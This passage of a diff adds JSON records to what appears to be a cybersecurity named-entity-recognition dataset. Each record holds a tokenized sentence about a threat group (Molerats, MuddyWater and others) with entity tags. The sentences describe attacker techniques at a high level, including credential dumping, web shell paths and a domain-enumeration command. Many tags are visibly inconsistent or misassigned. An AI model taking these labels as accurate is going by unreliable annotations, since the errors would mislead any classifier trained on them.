+ "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mofang", + "delivered", + "spearphishing", + "emails", + "with", + "malicious", + "links", + "included." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "has", + "used", + "forged", + "Microsoft", + "code-signing", + "certificates", + "on", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "used", + "the", + "public", + "tool", + "BrowserPasswordDump10", + "to", + "dump", + "passwords", + "saved", + "in", + "browsers", + "on", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "decompresses", + "ZIP", + "files", + "once", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "has", + "delivered", + "compressed", + "executables", + "within", + "ZIP", + "files", + "to", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "used", + "executables", + "to", + "download", + "malicious", + "files", + "from", + "different", + "sources." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "used", + "various", + "implants,", + "including", + "those", + "built", + "with", + "JS,", + "on", + "target", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "has", + "sent", + "malicious", + "files", + "via", + "email", + "that", + "tricked", + "users", + "into", + "clicking", + "Enable", + "Content", + "to", + "run", + "an", + "embedded", + "macro", + "and", + "to", + "download", + "malicious", + "archives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "has", + "sent", + "malicious", + "links", + "via", + "email", + "trick", + "users", + "into", + "opening", + "a", + "RAR", + "archive", + "and", + "running", + "an", + "executable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "has", + "used", + "msiexec.exe", + "to", + "execute", + "an", + "MSI", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "used", + "PowerShell", + "implants", + "on", + "target", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "actors", + "obtained", + "a", + "list", + "of", + "active", + "processes", + "on", + "the", + "victim", + "and", + "sent", + "them", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "saved", + "malicious", + "files", + "within", + "the", + "AppData", + "and", + "Startup", + "folders", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "has", + "created", + "scheduled", + "tasks", + "to", + "persistently", + "run", + "VBScripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Molerats", + "has", + "sent", + "phishing", + "emails", + "with", + "malicious", + "Microsoft", + "Word", + "and", + "PDF", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "has", + "sent", + "phishing", + "emails", + "with", + "malicious", + "links", + "included." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Molerats", + "used", + "various", + "implants,", + "including", + "those", + "built", + "with", + "VBScript,", + "on", + "target", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "used", + "signed", + "drivers", + "from", + "an", + "open", + "source", + "tool", + "called", + "DiskCryptor", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "used", + "batch", + "scripts", + "that", + "can", + "disable", + "the", + "Windows", + "firewall", + "on", + "specific", + "remote", + "machines." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "used", + "obfuscated", + "web", + "shells", + "in", + "their", + "operations." + ], + "ner_tags": [ + "B-HackOrg", + "B-Org", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "exploited", + "known", + "vulnerabilities", + "in", + "public-facing", + "infrastructure", + "such", + "as", + "Microsoft", + "Exchange", + "Servers." + ], + "ner_tags": [ + "B-HackOrg", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "downloaded", + "and", + "installed", + "web", + "shells", + "to", + "following", + "path", + "<code>C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\IISpool.aspx</code>." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "collected", + "the", + "administrator", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "built", + "malware,", + "such", + "as", + "DCSrv", + "and", + "PyDCrypt,", + "for", + "targeting", + "victims'", + "machines." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "used", + "batch", + "scripts", + "that", + "can", + "enable", + "SMB", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SecTeam", + "B-Org", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "collected", + "information", + "about", + "the", + "infected", + "host,", + "including", + "the", + "machine", + "names", + "and", + "OS", + "architecture." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "collected", + "the", + "domain", + "name", + "of", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "used", + "the", + "commercial", + "tool", + "DiskCryptor." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Moses", + "Staff", + "has", + "dropped", + "a", + "web", + "shell", + "onto", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoustachedBouncer", + "has", + "injected", + "content", + "into", + "DNS,", + "HTTP,", + "and", + "SMB", + "replies", + "to", + "redirect", + "specifically-targeted", + "victims", + "to", + "a", + "fake", + "Windows", + "Update", + "page", + "to", + "download", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoustachedBouncer", + "has", + "exploited", + "CVE-2021-1732", + "to", + "execute", + "malware", + "components", + "with", + "elevated", + "rights." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoustachedBouncer", + "has", + "used", + "JavaScript", + "to", + "deliver", + "malware", + "hosted", + "on", + "HTML", + "pages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "MoustachedBouncer", + "has", + "used", + "plugins", + "to", + "execute", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoustachedBouncer", + "has", + "used", + "a", + "reverse", + "proxy", + "tool", + "similar", + "to", + "the", + "GitHub", + "repository", + "revsocks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoustachedBouncer", + "has", + "used", + "plugins", + "to", + "save", + "captured", + "screenshots", + "to", + "`.\\AActdata\\`", + "on", + "an", + "SMB", + "share." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "MoustachedBouncer", + "has", + "used", + "plugins", + "to", + "take", + "screenshots", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MoustachedBouncer", + "has", + "used", + "malware", + "plugins", + "packed", + "with", + "Themida." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "the", + "native", + "Windows", + "cabinet", + "creation", + "tool,", + "makecab.exe,", + "likely", + "to", + "compress", + "stolen", + "data", + "to", + "be", + "uploaded." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "web", + "services", + "including", + "OneHub", + "to", + "distribute", + "remote", + "access", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "uses", + "various", + "techniques", + "to", + "bypass", + "UAC." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "CMSTP.exe", + "and", + "a", + "malicious", + "INF", + "to", + "execute", + "its", + "POWERSTATS", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "performed", + "credential", + "dumping", + "with", + "LaZagne." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "Daniel", + "Bohannon’s", + "Invoke-Obfuscation", + "framework", + "and", + "obfuscated", + "PowerShell", + "scripts.", + "The", + "group", + "has", + "also", + "used", + "other", + "obfuscation", + "methods,", + "including", + "Base64", + "obfuscation", + "of", + "VBScripts", + "and", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "the", + ".NET", + "csc.exe", + "tool", + "to", + "compile", + "executables", + "from", + "downloaded", + "C#", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "that", + "has", + "the", + "capability", + "to", + "execute", + "malicious", + "code", + "via", + "COM,", + "DCOM,", + "and", + "Outlook." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "run", + "a", + "tool", + "that", + "steals", + "passwords", + "saved", + "in", + "victim", + "email." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "performed", + "credential", + "dumping", + "with", + "LaZagne", + "and", + "other", + "tools,", + "including", + "by", + "dumping", + "passwords", + "saved", + "in", + "victim", + "email." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "run", + "tools", + "including", + "Browser64", + "to", + "steal", + "passwords", + "saved", + "in", + "victim", + "web", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "maintains", + "persistence", + "on", + "victim", + "networks", + "through", + "side-loading", + "dlls", + "to", + "trick", + "legitimate", + "programs", + "into", + "running", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "decoded", + "base64-encoded", + "PowerShell,", + "JavaScript,", + "and", + "VBScript." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "can", + "disable", + "the", + "system's", + "local", + "proxy", + "settings." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "<code>cmd.exe", + "net", + "user", + "/domain</code>", + "to", + "enumerate", + "domain", + "users." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "that", + "can", + "execute", + "PowerShell", + "scripts", + "via", + "DDE." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "C2", + "infrastructure", + "to", + "receive", + "exfiltrated", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "exploited", + "the", + "Microsoft", + "Exchange", + "memory", + "corruption", + "vulnerability", + "(CVE-2020-0688)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "exploited", + "the", + "Office", + "vulnerability", + "CVE-2017-0199", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "exploited", + "the", + "Microsoft", + "Netlogon", + "vulnerability", + "(CVE-2020-1472)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Exp", + "O", + "B-Exp", + "B-Features" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "controlled", + "POWERSTATS", + "from", + "behind", + "a", + "proxy", + "network", + "to", + "obfuscate", + "the", + "C2", + "location.", + "MuddyWater", + "has", + "used", + "a", + "series", + "of", + "compromised", + "websites", + "that", + "victims", + "connected", + "to", + "randomly", + "to", + "relay", + "information", + "to", + "command", + "and", + "control", + "(C2)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "that", + "checked", + "if", + "the", + "ProgramData", + "folder", + "had", + "folders", + "or", + "files", + "with", + "the", + "keywords", + "\"Kasper,\"", + "\"Panda,\"", + "or", + "\"ESET.\"" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-HackOrg", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "that", + "can", + "upload", + "additional", + "files", + "to", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "JavaScript", + "files", + "to", + "execute", + "its", + "POWERSTATS", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "performed", + "credential", + "dumping", + "with", + "LaZagne." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "performed", + "credential", + "dumping", + "with", + "Mimikatz", + "and", + "procdump64.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "stored", + "a", + "decoy", + "PDF", + "file", + "within", + "a", + "victim's", + "`%temp%`", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "attempted", + "to", + "get", + "users", + "to", + "open", + "malicious", + "PDF", + "attachment", + "and", + "to", + "enable", + "macros", + "and", + "launch", + "malicious", + "Microsoft", + "Word", + "documents", + "delivered", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "distributed", + "URLs", + "in", + "phishing", + "e-mails", + "that", + "link", + "to", + "lure", + "documents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "disguised", + "malicious", + "executables", + "and", + "used", + "filenames", + "and", + "Registry", + "key", + "names", + "associated", + "with", + "Windows", + "Defender." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "mshta.exe", + "to", + "execute", + "its", + "POWERSTATS", + "payload", + "and", + "to", + "pass", + "a", + "PowerShell", + "one-liner", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "one", + "C2", + "to", + "obtain", + "enumeration", + "scripts", + "and", + "monitor", + "web", + "logs,", + "but", + "a", + "different", + "C2", + "to", + "send", + "data", + "back." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "a", + "Word", + "Template,", + "Normal.dotm,", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "PowerShell", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "to", + "obtain", + "a", + "list", + "of", + "running", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "developed", + "tools", + "in", + "Python", + "including", + "Out1." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "added", + "Registry", + "Run", + "key", + "<code>KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding</code>", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "legitimate", + "applications", + "ScreenConnect", + "and", + "AteraAgent", + "to", + "manage", + "systems", + "remotely", + "and", + "move", + "laterally." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "that", + "leveraged", + "rundll32.exe", + "in", + "a", + "Registry", + "Run", + "key", + "to", + "execute", + "a", + ".dll." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "scheduled", + "tasks", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "that", + "can", + "capture", + "screenshots", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "to", + "check", + "running", + "processes", + "against", + "a", + "hard-coded", + "list", + "of", + "security", + "tools", + "often", + "used", + "by", + "malware", + "researchers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "a", + "PowerShell", + "backdoor", + "to", + "check", + "for", + "Skype", + "connectivity", + "on", + "the", + "target", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "compromised", + "third", + "parties", + "and", + "used", + "compromised", + "accounts", + "to", + "send", + "spearphishing", + "emails", + "with", + "targeted", + "attachments", + "to", + "recipients." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "sent", + "targeted", + "spearphishing", + "e-mails", + "with", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "tools", + "to", + "encode", + "C2", + "communications", + "including", + "Base64", + "encoding." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "stored", + "obfuscated", + "JavaScript", + "code", + "in", + "an", + "image", + "file", + "named", + "temp.jpg." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "AES", + "to", + "encrypt", + "C2", + "responses." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "that", + "can", + "collect", + "the", + "victim’s", + "OS", + "version", + "and", + "machine", + "name." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "to", + "collect", + "the", + "victim’s", + "IP", + "address", + "and", + "domain", + "name." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "a", + "PowerShell", + "backdoor", + "to", + "check", + "for", + "Skype", + "connections", + "on", + "the", + "target", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "malware", + "that", + "can", + "collect", + "the", + "victim’s", + "username." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "made", + "use", + "of", + "legitimate", + "tools", + "ConnectWise", + "and", + "Remote", + "Utilities", + "to", + "gain", + "access", + "to", + "target", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "VBScript", + "files", + "to", + "execute", + "its", + "POWERSTATS", + "payload,", + "as", + "well", + "as", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MuddyWater", + "has", + "used", + "file", + "sharing", + "services", + "including", + "OneHub,", + "Sync,", + "and", + "TeraBox", + "to", + "distribute", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + 